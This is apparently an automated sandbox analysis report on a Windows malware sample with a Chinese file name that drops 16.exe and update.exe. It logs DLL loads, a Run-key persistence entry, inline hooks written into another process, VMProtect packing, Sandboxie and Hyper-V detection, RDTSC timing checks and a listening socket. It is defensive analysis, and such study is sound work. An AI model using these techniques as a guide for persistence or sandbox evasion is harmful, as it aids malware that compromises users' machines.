Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: msvcp60.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\update.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041AAD0 GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary, 0_2_0041AAD0
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: 16.exe.0.dr Static PE information: section name: .vmp0
Source: 16.exe.0.dr Static PE information: section name: .vmp1
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00481DA0 push eax; ret 0_2_00481DCE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00483FF4 push eax; ret 0_2_00484012
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00481DA0 push eax; ret 3_2_00481DCE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00483FF4 push eax; ret 3_2_00484012
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02188000 push eax; ret 7_3_0218802E
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004821B0 push eax; ret 7_2_004821DE
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00484854 push eax; ret 7_2_00484872
Source: update.exe.4.dr Static PE information: section name: .text entropy: 7.398153127263923
Source: C:\Users\user\Desktop\ 16.exe File created: \ 16.exe
Source: C:\Users\user\Desktop\ 16.exe File created: \ 16.exe Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe File created: C:\Users\user\Desktop\ 16.exe Jump to dropped file
Source: C:\Users\user\Desktop\ 16.exe File created: C:\Users\user\Desktop\update.exe Jump to dropped file
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 1 Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 1 Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 11A0005 value: E9 2B BA D3 75 Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 76EDBA30 value: E9 DA 45 2C 8A Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 1210008 value: E9 8B 8E D1 75 Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 76F28E90 value: E9 80 71 2E 8A Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2CE0005 value: E9 8B 4D 39 73 Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 76074D90 value: E9 7A B2 C6 8C Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2CF0005 value: E9 EB EB 39 73 Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 7608EBF0 value: E9 1A 14 C6 8C Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2D00005 value: E9 8B 8A 8A 73 Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 765A8A90 value: E9 7A 75 75 8C Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 2D10005 value: E9 2B 02 8C 73 Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Memory written: PID: 6340 base: 765D0230 value: E9 DA FD 73 8C Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041E8A0 DestroyIcon,IsWindowVisible,IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMenu,DeleteMenu,GetSystemMenu, 0_2_0041E8A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00422C90 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow, 0_2_00422C90
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041EF70 IsIconic,IsZoomed, 0_2_0041EF70
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004194E0 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus, 0_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047FE9F IsIconic,GetWindowPlacement,GetWindowRect, 0_2_0047FE9F
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041E8A0 DestroyIcon,IsWindowVisible,IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMenu,DeleteMenu,GetSystemMenu, 3_2_0041E8A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00422C90 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow, 3_2_00422C90
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041EF70 IsIconic,IsZoomed, 3_2_0041EF70
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004194E0 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus, 3_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047FE9F IsIconic,GetWindowPlacement,GetWindowRect, 3_2_0047FE9F
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00480750 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect, 7_2_00480750
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00437210 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus, 7_2_00437210
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004438D0 IsIconic,IsZoomed,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsWindow,ShowWindow, 7_2_004438D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\update.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046EA70 7_2_0046EA70
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00477AC0 7_2_00477AC0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00473DE0 7_2_00473DE0
Source: 16.exe, 00000004.00000002.1880621041.00000000007F0000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: SBIEDLL.DLL
Source: 16.exe, 00000004.00000002.1880621041.00000000007F0000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: SBIEDLL.DLL2E3
Source: C:\Users\user\Desktop\ 16.exe RDTSC instruction interceptor: First address: AEF537 second address: AEF53F instructions: 0x00000000 rdtsc 0x00000002 btr edx, ebp 0x00000005 xor cl, FFFFFFB7h 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ 16.exe RDTSC instruction interceptor: First address: A0401F second address: A04027 instructions: 0x00000000 rdtsc 0x00000002 btr edx, ebp 0x00000005 xor cl, FFFFFFB7h 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ 16.exe RDTSC instruction interceptor: First address: A1B927 second address: A1B929 instructions: 0x00000000 rdtsc 0x00000002 rdtsc
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe API coverage: 6.0 %
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe API coverage: 5.5 %
Source: C:\Users\user\Desktop\update.exe API coverage: 3.7 %
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00473DE0 7_2_00473DE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 0_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00423610 FindFirstFileA,FindClose, 0_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 0_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 0_2_00411EF0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 3_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00423610 FindFirstFileA,FindClose, 3_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 3_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 3_2_00411EF0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004929E2 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 7_2_004929E2
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00438DA0 FindNextFileA,FindClose,FindFirstFileA,FindClose, 7_2_00438DA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043BF10 FindFirstFileA,FindClose, 7_2_0043BF10
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0042FF90 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 7_2_0042FF90
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{Q
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000063E000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 16.exe, 00000004.00000002.1882625896.000000000137A000.00000004.00000020.00020000.00000000.sdmp, 16.exe, 00000004.00000003.1879496954.000000000137A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnto!
Source: C:\Users\user\Desktop\update.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ 16.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041AAD0 GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary, 0_2_0041AAD0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00407136 mov ebx, dword ptr fs:[00000030h] 0_2_00407136
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00407136 mov ebx, dword ptr fs:[00000030h] 3_2_00407136
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0040158F mov eax, dword ptr fs:[00000030h] 7_2_0040158F
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00440F30 GetProcessHeap,OleInitialize,GetModuleFileNameA,SetCurrentDirectoryA,LoadCursorA,GetStockObject,GetCurrentThreadId, 0_2_00440F30
Source: C:\Users\user\Desktop\ 16.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048CA6A SetUnhandledExceptionFilter, 0_2_0048CA6A
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048CA7C SetUnhandledExceptionFilter, 0_2_0048CA7C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0048CA6A SetUnhandledExceptionFilter, 3_2_0048CA6A
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0048CA7C SetUnhandledExceptionFilter, 3_2_0048CA7C
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0048C457 SetUnhandledExceptionFilter, 7_2_0048C457
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0048C469 SetUnhandledExceptionFilter, 7_2_0048C469
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02184C10 cpuid 7_3_02184C10
Source: C:\Users\user\Desktop\ 16.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ 16.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00483200 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 0_2_00483200
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048CDBC GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_0048CDBC
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0049C369 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 0_2_0049C369
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00474C10 htons,bind,listen, 7_2_00474C10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs